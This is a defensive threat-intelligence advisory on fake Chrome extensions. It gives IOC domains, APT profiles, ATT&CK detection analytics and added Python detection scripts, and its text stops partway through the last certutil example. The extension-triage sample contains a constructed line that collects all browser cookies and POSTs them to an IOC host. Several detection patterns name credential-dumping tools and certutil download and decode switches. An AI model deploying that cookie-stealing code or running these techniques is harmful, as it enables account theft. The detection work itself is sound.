Stealthy Chrome Extensions Exploit Trusted Brands to Exfiltrate User Data

Tags: Chrome Malware, Fake Chrome Addons, Stealth Malware

A new campaign distributes fake Chrome extensions that impersonate trusted brands (the domain list below imitates VPN, ad-analytics, crypto-wallet, calendar and AI-assistant products) and quietly collect personal data from the users who install them. The extensions exploit brand trust and everyday browsing habits rather than a software vulnerability, which is why user awareness and extension governance matter as much as technical controls.

Indicators of Compromise

cryptowhalesvision.world
glimmerbloop.top
api.zorpleflux.top
spaceball.top
snogglewomp.top
workfront.plus.com
infosync.top
siteanalyzer.world
quirkleblip.top
web.analytics.top
iron.tunnel.com
twizzleflap.top
whale.alerts.org
api.glimmerbloop.top
ioonline.top
lockads.org
squirrel.wallet.world
wobblefizz.top
soul.vpn.com
flibberwump.top
sitestats.world
quizzlepuff.top
floopdoodle.top
creativehunter.world
noodlequack.top
e.xt.top
blurflewhack.top
iochange.top
youtube.vision.com
webinsight.world
adelephant.world
web.metrics.link
fortivnp.com
ioapp.sbs
calendlydocker.com
datazen.sbs
ad.eye.help
madgicxads.world
similar.net.com
manusai.sbs
snickerdoodle.top
youtube.vision.world
debank.click
iohub.sbs
earthvpn.top
fizzlepopcorn.top
meta.spy.help
am.sector.world
ad.vision.click
ad.spy.world
amlsector.com
debank.extension.world
raccoon.vpn.world
digigtalwow.top
adtwin.world
iospace.top
jibberjot.top
twin.web.world
irontunnel.world
ad.guardian.world
wti.analytics.com
ad.seeker.world
wobbleguff.top
x-theme.world
eventphere.com
whale.alert.life
spylens.world
crypto.whale.top
wibblywob.top
datavibe.sbs
zorpleflux.top
api.sprocketwhirl.top
infograph.top
meta.guests.com
flight.radar.life
safesurf.world
cookie.whitelist.com
wtigroups.com
madgicx.plus.com
orchid.vpn.com
calendlydaily.world
ad.vision.top
digigtalneo.top
analytics.box.world
infonet.sbs
jumblefizz.top
privacy.shield.world
debank.sbs
deepseek-ai.link
meta.spy365.com
forti.vpn.com
webwatch.world
sprocketwhirl.top
creativepeek.world
crypto.whale.info
calendly.director.com
zingleflap.top
addetective.world
api.infograph.top
ad.scope.world
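Added example (not part of the advisory): a Python triage script that walks a Chrome profile's Extensions directory, parses each manifest.json, flags extensions holding data-harvesting permissions, and matches hostnames found in their code against the IOC domains above. The IOC subset, the risky-permission list and the two sample extensions it writes to a temporary directory are constructed for the example; the on-disk layout Extensions/<id>/<version>/manifest.json is Chrome's real layout.

```python
"""Triage installed Chrome extensions against the campaign IOC domain list.

Added example, not from the original advisory. IOC_DOMAINS is a subset of the
domains published on the page; the two extensions written by
build_sample_profile() are constructed for the demonstration.
"""
import json
import re
import tempfile
from pathlib import Path

# Subset of the advisory's IOC domains (kept short for the example).
IOC_DOMAINS = {
    "api.zorpleflux.top", "zorpleflux.top", "debank.sbs", "forti.vpn.com",
    "calendlydaily.world", "deepseek-ai.link", "meta.spy365.com",
}

# Permissions that give an extension enough reach to harvest browsing data.
RISKY_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking", "cookies",
                     "tabs", "history", "scripting", "clipboardRead"}

# Crude hostname extractor: anything that looks like dotted labels, with an optional scheme.
DOMAIN_RE = re.compile(r"(?:https?://|wss?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def ioc_matches(text, iocs=IOC_DOMAINS):
    """Return IOC domains referenced in text; matches exact hosts and their subdomains."""
    found = set()
    for m in DOMAIN_RE.finditer(text):
        host = m.group(1).lower().strip(".")
        for ioc in iocs:
            if host == ioc or host.endswith("." + ioc):
                found.add(ioc)
    return found


def triage_extension(version_dir, iocs=IOC_DOMAINS):
    """Inspect one Extensions/<id>/<version>/ directory and return a findings dict."""
    version_dir = Path(version_dir)
    manifest = json.loads((version_dir / "manifest.json").read_text(encoding="utf-8"))
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        perms.update(cs.get("matches", []))
    hits = set()
    for path in version_dir.rglob("*"):
        if path.is_file() and path.suffix.lower() in {".js", ".json", ".html"}:
            hits |= ioc_matches(path.read_text(encoding="utf-8", errors="ignore"), iocs)
    risky = perms & RISKY_PERMISSIONS
    return {
        "id": version_dir.parent.name,
        "name": manifest.get("name", "?"),
        "risky_permissions": sorted(risky),
        "ioc_hits": sorted(hits),
        # An IOC reference is decisive; broad permissions alone only earn a review.
        "verdict": "malicious" if hits else ("review" if risky else "ok"),
    }


def triage_profile(extensions_root, iocs=IOC_DOMAINS):
    """Walk a profile's Extensions directory and triage every installed version."""
    return [triage_extension(m.parent, iocs)
            for m in Path(extensions_root).glob("*/*/manifest.json")]


def build_sample_profile(root):
    """Constructed sample: a benign theme and a fake VPN helper that posts cookies to an IOC host."""
    bad = Path(root) / "abcdefghijklmnopabcdefghijklmnop" / "1.0.3_0"
    bad.mkdir(parents=True)
    (bad / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Forti VPN Helper",
        "permissions": ["cookies", "tabs", "storage"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "bg.js"}}))
    (bad / "bg.js").write_text(
        'chrome.cookies.getAll({}, c => fetch("https://api.zorpleflux.top/v1/sync",'
        ' {method: "POST", body: JSON.stringify(c)}));')
    good = Path(root) / "ponmlkjihgfedcbaponmlkjihgfedcba" / "2.1.0_0"
    good.mkdir(parents=True)
    (good / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Dark Theme", "permissions": ["storage"]}))
    (good / "theme.js").write_text('document.body.style.background = "#000";')
    return root


def run_sample():
    """Build the constructed profile in a temp dir, triage it, return results keyed by name."""
    with tempfile.TemporaryDirectory() as tmp:
        return {r["name"]: r for r in triage_profile(build_sample_profile(tmp))}


if __name__ == "__main__":
    for name, result in run_sample().items():
        print(name, result["verdict"], result["ioc_hits"], result["risky_permissions"])
```

For a real host, point triage_profile() at %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions on Windows (or ~/Library/Application Support/Google/Chrome/Default/Extensions on macOS) and load the full IOC list. Many legitimate extensions request <all_urls>, so the permission check is deliberately only a review trigger; the IOC match is what produces a malicious verdict.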

APT Groups

APT 5

Summary of Actor: APT 5 is a sophisticated cyber-espionage group widely believed to operate with nation-state backing. It primarily targets the aerospace and defense industries and is known for stealthy tradecraft and sustained, long-running campaigns.

General Features: APT 5 persists in target environments over long periods and uses advanced malware and zero-day exploits. It often customizes its tools for specific targets and relies on spear-phishing and strategic web compromises as initial access vectors.

Related Other Groups: APT 3, APT 10, APT 29

Indicators of Attack (IoA):
- Use of custom malware
- Spear-phishing emails
- Strategic web compromises
- Zero-day exploits

Recent Activities and Trends:
- Latest Campaigns: APT 5 has been linked to recent cyber-espionage campaigns targeting government institutions and defense contractors in North America and Europe.
- Emerging Trends: increased use of supply-chain attacks and targeting of IT service providers as a path to the ultimate targets, along with more advanced evasion techniques in its malware.

Aliases: APT 5, Manganese, Mulberry Typhoon, TG-2754, Bronze Fleetwood, TEMP.Bottle, Keyhole Panda, Poisoned Flight

APT Iran

Overview: APT Iran refers to a collection of threat actors suspected to operate under Iranian state interests. These actors conduct cyber espionage, sabotage, and information operations against regional and global targets.

Key Characteristics:
- State-sponsored and geopolitically motivated
- Notable groups: APT33, APT34 (OilRig), APT35 (Charming Kitten), APT39
- Operations span surveillance, disinformation, and destructive attacks

Indicators of Attack (IoA):
- Use of credential harvesting pages and spearphishing
- C2 over HTTPS and DNS
- Tools include PowerShell-based backdoors and wipers

Recent Activities and Trends:
- Targeting Israeli and U.S. critical infrastructure
- Use of new malware families (e.g. POWERSTAR, SHARPSTATS)
- Blending hacktivism with state-sponsored capabilities

Aliases: EUROPIUM, Hazel Sandstorm, UNC788, Yellow Maero, TunnelVision, Timberworm, Crambus, G0049, TA452, Magic Hound, Agent Serpens, Phosphorus, Charming Kitten, Evasive Serpens, UNC1860, Tarh Andishan, APT 35, Ballistic Bobcat, CharmingCypress, Educated Manticore, ITG13, Scarred Manticore, Cobalt Mirage, IRN2, Cobalt Illusion, OilRig, Yellow Garuda, Mint Sandstorm, Chrysene, Helix Kitten, APT 34, Earth Simnavaz, Greenbug, DEV-0861, ATK 40, TEMP.Beanie, TA453, Twisted Kitten, Storm-0861, Cobalt Gypsy

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION


T1113 - Screen Capture


ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution
Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.

DS0009 | Process | OS API Execution
Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes that use API calls or utilities that obtain image data (for example CopyFromScreen on Windows/.NET, xwd on X11, or screencapture on macOS), and monitoring for image files written to disk.[1][2] The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.


T1033 - System Owner/User Discovery


ID | Data Source | Data Component | Detects

DS0026 | Active Directory | Active Directory Object Access
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.[240][241][242] Note: domain controllers may not log replication requests originating from the default domain controller account.[243] Monitor for replication requests[244] from IPs not associated with known domain controllers.[245]

DS0017 | Command | Command Execution
Monitor executed commands and arguments that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Look for command lines that invoke AuditD or the Security Accounts Manager (SAM). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,[246] which may require additional logging features to be configured in the operating system to collect the necessary information for analysis.

Note: Event ID 4104 (from the Microsoft-Windows-PowerShell/Operational log) captures PowerShell script blocks, which can be analyzed to detect scripted credential dumping such as Invoke-Mimikatz.

DS0022 | File | File Access
Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%\System32\config\SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in use by adversaries may help as well.

DS0029 | Network Traffic | Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)).

Note: Network analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols.

DS0029 | Network Traffic | Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

DS0009 | Process | OS API Execution
Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.

DS0009 | Process | Process Access
Monitor for unexpected processes interacting with lsass.exe.[247] Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.

Linux: to obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/<pid>/maps, where the <pid> directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.

DS0009 | Process | Process Creation
Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.

Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The analytic looks for the creation of known credential-dumping tools such as Mimikatz and ProcDump (the latter is commonly used to dump LSASS memory). If these tools are used legitimately in your environment (e.g., by administrators for debugging) this may lead to false positives and the analytic will therefore require tuning.

Analytic 1 - Suspicious Process Execution

((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688")) AND (Image="*\mimikatz.exe" OR Image="*\procdump.exe" OR Image="*\procdump64.exe")

DS0024 | Windows Registry | Windows Registry Key Access
Monitor for the SAM registry key being accessed, which may indicate an attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.


T1114 - Email Collection


ID | Data Source | Data Component | Detects

DS0015 | Application Log | Application Log Content
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to be unaware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts are platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy, and X-Forwarded-To.

The forwardingSMTPAddress parameter is used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.[12] High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than the user level.

DS0017 | Command | Command Execution
Monitor executed processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

In Exchange environments (on-premises or Exchange Online), monitor for creation of suspicious inbox and transport rules through the use of the New-InboxRule, Set-InboxRule, New-TransportRule, and Set-TransportRule PowerShell cmdlets.[13][14]

DS0022 | File | File Access
Monitor for unusual processes accessing local system email files (staging for Exfiltration), unusual processes connecting to an email server within the network, or unusual access patterns or authentication attempts on a public-facing webmail server; all may be indicators of malicious activity.

DS0028 | Logon Session | Logon Session Creation
Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (e.g. an Exchange administrator account).

DS0029 | Network Traffic | Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.
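Added example (not part of the advisory): Python detection logic for the auto-forwarding artifacts described under Application Log Content above. It reads message headers with the standard library's email parser, records which auto-forward headers each message carries, and then applies the page's heuristic: many messages tagged X-MS-Exchange-Organization-AutoForwarded that do not look forwarded in the client (no FW:/Fwd: subject) point at an administrator-level forwarding setting rather than a user-created rule. The four raw messages and the 50% ratio threshold are constructed for the example.

```python
"""Detect mailbox auto-forwarding from header artifacts (T1114).

Added example, not from the advisory. Header names come from the guidance
above; SAMPLE_MESSAGES are constructed, headers-only messages.
"""
from email import message_from_string
from email.message import Message

FWD_SUBJECT_PREFIXES = ("fw:", "fwd:")


def forward_artifacts(msg: Message) -> dict:
    """Which auto-forward artifacts a message carries, and whether it *looks* forwarded."""
    artifacts = {}
    if msg.get("X-MS-Exchange-Organization-AutoForwarded", "").strip().lower() == "true":
        artifacts["X-MS-Exchange-Organization-AutoForwarded"] = "true"
    for header in ("X-MailFwdBy", "X-Forwarded-To"):
        if msg.get(header):
            artifacts[header] = msg[header].strip()
    subject = (msg.get("Subject") or "").strip().lower()
    return {
        "auto_forwarded": bool(artifacts),
        "artifacts": artifacts,
        # A client-side forward rewrites the subject; a server-side rule does not.
        "looks_forwarded": subject.startswith(FWD_SUBJECT_PREFIXES),
    }


def artifacts_from_raw(raw: str) -> dict:
    return forward_artifacts(message_from_string(raw))


def classify_mailbox(raw_messages, ratio_threshold=0.5) -> dict:
    """Summarize one mailbox. escalate_to_admin is set when at least ratio_threshold
    of the auto-forwarded messages show no forwarded appearance, i.e. the page's
    signature for forwardingSMTPAddress-style, admin-managed forwarding."""
    auto_total = silent = 0
    destinations = set()
    for raw in raw_messages:
        info = artifacts_from_raw(raw)
        if not info["auto_forwarded"]:
            continue
        auto_total += 1
        if not info["looks_forwarded"]:
            silent += 1
        if "X-Forwarded-To" in info["artifacts"]:
            destinations.add(info["artifacts"]["X-Forwarded-To"].lower())
    silent_ratio = silent / auto_total if auto_total else 0.0
    return {
        "auto_forwarded": auto_total,
        "silent": silent,
        "destinations": sorted(destinations),
        "escalate_to_admin": auto_total > 0 and silent_ratio >= ratio_threshold,
    }


# Constructed sample: two silently auto-forwarded messages, one user forward, one normal mail.
SAMPLE_MESSAGES = [
    "From: ceo@example.com\r\nTo: cfo@example.com\r\nSubject: Q3 numbers\r\n"
    "X-MS-Exchange-Organization-AutoForwarded: true\r\n"
    "X-Forwarded-To: drop@mail.example.net\r\n\r\nbody",
    "From: hr@example.com\r\nTo: cfo@example.com\r\nSubject: Payroll change\r\n"
    "X-MS-Exchange-Organization-AutoForwarded: true\r\n"
    "X-Forwarded-To: drop@mail.example.net\r\n\r\nbody",
    "From: cfo@example.com\r\nTo: assistant@example.com\r\nSubject: FW: lunch\r\n"
    "X-MailFwdBy: cfo@example.com\r\n\r\nbody",
    "From: vendor@example.org\r\nTo: cfo@example.com\r\nSubject: Invoice\r\n\r\nbody",
]

if __name__ == "__main__":
    print(classify_mailbox(SAMPLE_MESSAGES))
```

Run this per mailbox over a message-trace export or a journaled copy of mail, not over the user's own view, since a server-side forward leaves nothing in the source mailbox to inspect.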


T1119 - Automated Collection


ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution
Monitor executed commands and arguments for actions that could be taken to collect internal data.

DS0022 | File | File Access
Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) being viewed in bulk, which may indicate collection of internal data.

DS0012 | Script | Script Execution
Monitor for any attempts to enable scripts running on a system; such attempts would be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

DS0002 | User Account | User Account Authentication
Monitor Microsoft Entra ID (formerly Azure AD) sign-in logs for suspicious applications authenticating to the Graph API or other sensitive resources using User-Agent strings attributed to scripting interpreters such as Python or PowerShell.

Analytic 1 - Suspicious applications, unusual user agents (e.g., python, PowerShell), anomalous IP addresses, and unmanaged devices

index="azure_ad_signin_logs" Operation="UserLogin"
| search UserAgent="*python*" OR UserAgent="*PowerShell*"
| stats count by ClientIP, UserId, DeviceProperties
| where ClientIP!="expected_ip" OR DeviceProperties!="expected_properties"


T1082 - System Information Discovery


ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution
Monitor executed commands and arguments that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. On ESXi servers, monitor discovery commands in the /var/log/shell.log history file.

DS0009 | Process | OS API Execution
Monitor for API calls that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.

DS0009 | Process | Process Creation
Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.


T1071 - Application Layer Protocol


ID | Data Source | Data Component | Detects

DS0029 | Network Traffic | Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated with protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)).

DS0029 | Network Traffic | Network Traffic Flow
Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)).


T1176 - Browser Extensions


ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution
Monitor executed commands and arguments for usage of the macOS profiles tool, such as profiles install -type=configuration, which can push browser extension settings through a configuration profile.

Analytic 1 - Look for command-line activity tied to mobileconfig or extension deployment

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 (CommandLine="*profiles install*" OR CommandLine="*.mobileconfig*" OR CommandLine="*chrome-extension*")
| stats count by CommandLine, Image, ParentImage, User, Computer, _time
| sort -_time

DS0022 | File | File Creation
Monitor for:
- Newly written .crx, .xpi, or .mobileconfig files
- Modified .plist files under /Library/Managed Preferences/ (macOS)
- Creation of extension directories under:
  - Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions
  - Firefox: %APPDATA%\Mozilla\Firefox\Profiles\*.default\extensions

Analytic 1 - Detect newly written extension and config files

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=11 (TargetFilename="*\Extensions\*" OR TargetFilename="*.crx" OR TargetFilename="*.xpi" OR TargetFilename="*.mobileconfig")
| stats count by TargetFilename, Image, User, Computer, _time
| sort -_time

DS0029 | Network Traffic | Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.

DS0009 | Process | Process Creation
Monitor for execution of chrome.exe, firefox.exe, or msedge.exe with arguments like --load-extension, --pack-extension, or --disable-extensions-file-access-check. Also monitor for unexpected command-line installs and developer-mode (unpacked) extensions.

Analytic 1 - Browser execution with extension-loading switches

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 (CommandLine="*--load-extension*" OR CommandLine="*--pack-extension*")
| stats count by Image, CommandLine, User, host, _time
| sort -_time

DS0024 | Windows Registry | Windows Registry Key Creation
Monitor for new items written to the Registry, or PE files written to disk, that may correlate with browser extension installation:
- Chrome extension registry keys under HKCU\Software\Google\Chrome\Extensions
- Chrome's force-install policy under HKLM\Software\Policies\Google\Chrome\ExtensionInstallForcelist, which installs extensions silently for every user
- Firefox entries under HKCU\Software\Mozilla\Firefox\Extensions
- Unexpected changes or new GUIDs under these keys

Analytic 1 - Browser extension registry keys created

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=13 (TargetObject="*\Software\Google\Chrome\Extensions\*" OR TargetObject="*\Software\Policies\Google\Chrome\ExtensionInstallForcelist\*" OR TargetObject="*\Software\Mozilla\Firefox\Extensions\*")
| stats count by TargetObject, Details, User, Computer, _time
| sort -_time
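Added example (not part of the advisory): the three T1176 checks above (browser launched with an extension-loading switch, extension files written by something other than the browser, and extension registry keys created) expressed as Python detection logic over Sysmon-style events instead of SPL. Field names follow Sysmon's event schema; the five events in SAMPLE_EVENTS are constructed, not captured telemetry.

```python
"""Event-level detection of browser extension sideloading (T1176).

Added example, not from the advisory. Field names follow Sysmon's
(EventCode, Image, CommandLine, TargetFilename, TargetObject, Computer);
SAMPLE_EVENTS are constructed for the demonstration.
"""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Chromium switches that load an unpacked extension or weaken extension checks.
FLAG_RE = re.compile(
    r'(--(?:load-extension|pack-extension|disable-extensions-file-access-check))'
    r'(?:=("[^"]*"|\S+))?', re.I)

# Extension artifacts on disk: profile Extensions folders and packed extension/config files.
EXT_FILE_RE = re.compile(r"\\extensions\\|\.(crx|xpi|mobileconfig)$", re.I)

# Registry paths that install extensions without the user's explicit consent:
# legacy external-extension keys and Chrome's ExtensionInstallForcelist policy.
EXT_REG_RE = re.compile(
    r"\\software\\(google\\chrome\\extensions|mozilla\\firefox\\extensions"
    r"|policies\\google\\chrome\\extensioninstallforcelist)\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def sideload_flags(cmdline):
    """Return {switch: value} for sideloading switches in a browser command line
    (value is the extension path for --load-extension/--pack-extension, else None)."""
    return {flag.lower(): (val.strip('"') or None) for flag, val in FLAG_RE.findall(cmdline)}


def detect(events):
    """Run the three T1176 checks over Sysmon-style events and return alert dicts."""
    alerts = []
    for e in events:
        code, host = e.get("EventCode"), e.get("Computer")
        image = basename(e.get("Image", ""))
        if code == 1 and image in BROWSERS:
            flags = sideload_flags(e.get("CommandLine", ""))
            if flags:
                alerts.append({"rule": "browser-sideload-flag", "host": host,
                               "image": image, "flags": flags})
        elif code == 11 and image not in BROWSERS and EXT_FILE_RE.search(e.get("TargetFilename", "")):
            # Browsers write their own Extensions folders; any other writer is worth a look.
            alerts.append({"rule": "extension-file-written-by-non-browser", "host": host,
                           "image": image, "path": e["TargetFilename"]})
        elif code in (12, 13) and EXT_REG_RE.search(e.get("TargetObject", "")):
            alerts.append({"rule": "extension-registry-install", "host": host,
                           "image": image, "key": e["TargetObject"]})
    return alerts


SAMPLE_EVENTS = [  # constructed
    {"EventCode": 1, "Computer": "WS01",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r'--load-extension="C:\Users\bob\AppData\Local\Temp\vpnhelper" https://example.com'},
    {"EventCode": 1, "Computer": "WS01",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"EventCode": 11, "Computer": "WS02",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Extensions"
                       r"\abcdefghijklmnopabcdefghijklmnop\1.0_0\manifest.json"},
    {"EventCode": 11, "Computer": "WS02",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Extensions"
                       r"\ponmlkjihgfedcbaponmlkjihgfedcba\2.1_0\manifest.json"},
    {"EventCode": 13, "Computer": "WS03", "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist\1"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The second and fourth events are deliberately benign (a normal Chrome launch, and Chrome itself writing an extension manifest) and produce no alert; the file-creation rule only fires when a non-browser process such as PowerShell drops files into the Extensions tree.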


T1140 - Deobfuscate/Decode Files or Information


ID | Data Source | Data Component | Detects

DS0022 | File | File Modification
Monitor for changes made to files for unexpected modifications that attempt to hide artifacts. On Windows, Event ID 4663 (Security Log - An attempt was made to access an object) can be used to alert on suspicious file accesses (e.g., attempting to write to a file which shouldn't be further modified) that may coincide with attempts to hide artifacts.

DS0009 | Process | Process Creation
Monitor for newly executed processes that attempt to hide artifacts of an intrusion, such as common archive file applications (ex: Zip and RAR archive tools), and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.

CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding converts a file to base64 wrapped in -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding an encoded file that was downloaded; once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used, -encodehex and -decodehex, which encode the file in hex for later decoding and execution. During triage, identify the source of the file being decoded and review its contents or execution behavior for further analysis.

Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The analytic is oriented around the creation of CertUtil.exe processes with a decode switch.

Analytic 1 - CertUtil with Decode Argument

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")) AND Image="C:\Windows\System32\certutil.exe" AND CommandLine="*decode*"

DS0012 | Script | Script Execution
Monitor for any attempts to enable scripts running on a system; such attempts would be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
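Added example (not part of the advisory): Python code for the CertUtil case above, covering both sides of the technique. It reproduces the -----BEGIN CERTIFICATE----- wrapper layout that certutil -encode emits, decodes such a blob found on disk and classifies the payload (a genuine certificate is DER and starts with byte 0x30, a dropped executable starts with MZ, decodable text is most likely a script), and flags certutil command lines that carry a decode or download switch. FAKE_PE is a constructed stand-in for a dropped executable, not real malware.

```python
"""Spot certutil-encoded payloads on disk and certutil decode/download command lines (T1140).

Added example, not from the advisory. certutil -encode emits base64 between
BEGIN/END CERTIFICATE lines, 64 characters per line; FAKE_PE is a constructed
stand-in for a dropped executable.
"""
import base64
import binascii
import re

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"
# Switches worth alerting on: the decode variants turn a dropped text blob back
# into a binary, -urlcache is the download primitive. -encode alone is usually benign.
SWITCH_RE = re.compile(r"(?<![\w-])-(decodehex|decode|encodehex|encode|urlcache)\b", re.I)
ALERT_SWITCHES = {"decode", "decodehex", "urlcache"}


def certutil_encode(data: bytes) -> str:
    """Reproduce the layout of `certutil -encode` output (used here to build the sample)."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([BEGIN, *lines, END, ""])


def decode_certutil_wrapped(text: str):
    """Return the decoded bytes if text is a certutil-style wrapped blob, else None."""
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    if len(lines) < 3 or lines[0] != BEGIN or lines[-1] != END:
        return None
    try:
        return base64.b64decode("".join(lines[1:-1]), validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_payload(data: bytes) -> str:
    """What sits inside the wrapper: DER certificate (0x30), PE (MZ), text, or other binary."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:1] == b"\x30":
        return "der-certificate"
    try:
        data.decode("utf-8")
        return "text-script"
    except UnicodeDecodeError:
        return "unknown-binary"


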